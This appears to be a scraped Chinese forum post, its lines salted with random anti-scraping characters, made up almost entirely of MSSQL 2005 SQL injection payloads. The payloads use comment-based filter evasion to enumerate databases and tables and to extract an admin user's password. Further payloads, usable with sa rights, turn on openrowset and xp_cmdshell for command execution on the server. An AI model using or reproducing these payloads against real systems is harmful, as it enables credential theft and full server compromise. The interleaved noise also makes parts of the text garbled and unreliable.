# v' E! i& w0 o8 w1 |- @
) r/ y6 d4 r" |% q0 y6 @; s
* P# r& V4 |! g% F; p$ y' b[Copy to clipboard]CODE:
' k1 Y2 j9 i! V+ ^1 F4 N/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
/ [) o8 j/ k' O- }; S
" S$ G8 n) z/ X5 P3 E& h* ^' ]7 _爆表语句,somedb部份是所要列的数据库,红色数字1累加
5 t! S2 ?- ]( \$ p/ d
9 p/ p) T, z. x- l0 P' X* z- @4 e' N7 E# Z- m4 J
[Copy to clipboard]CODE:# O# h; ~2 U* w# i
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--; @# y w& O# H* T- V( d
7 E" g& p( z) @& D3 N4 b
爆字段语句,爆表admin里user='icerover'的密码段/ e( @4 _, K) J! S4 i
( `- L ?; k# k( j0 Y
1 e9 r1 `. y* U. _0 c: `
[Copy to clipboard]CODE:
: G: t0 N, t9 Q" w1 x8 z**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
" H2 L' y$ f( w; H% r# C( @' E! N W$ U8 ?. H
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
; r0 M' \$ L q! `, `# N如果是sa权限,可以这样来开启: k* l' V( T. F0 f7 p
开启openrowset' q2 o4 A9 _, _3 R+ y4 V2 c
3 O/ D5 j {4 T
9 o3 s) H: O, B$ `[Copy to clipboard]CODE:5 d* ~5 _& M( @: J
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
4 |" a5 G& G! |) M- C/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
8 ?6 I$ L% }5 k: M/ s# _' A4 P$ l% o& O* |3 D
开启xp_cmdshell( A8 k' ]3 ]7 ~9 {* S
$ T1 e( K6 z2 i. v, B% E
$ J0 H/ N+ r" P4 z
[Copy to clipboard]CODE:. w+ U* f6 i% {' _8 R/ I8 ?5 ?$ |
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
9 R( w9 g* c# K9 B" T( NEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
3 W3 ^- b2 j) I$ H4 D
. k9 g4 K/ x& r" nok,over~~晚安! C2 Q: X# e; r% h) M
|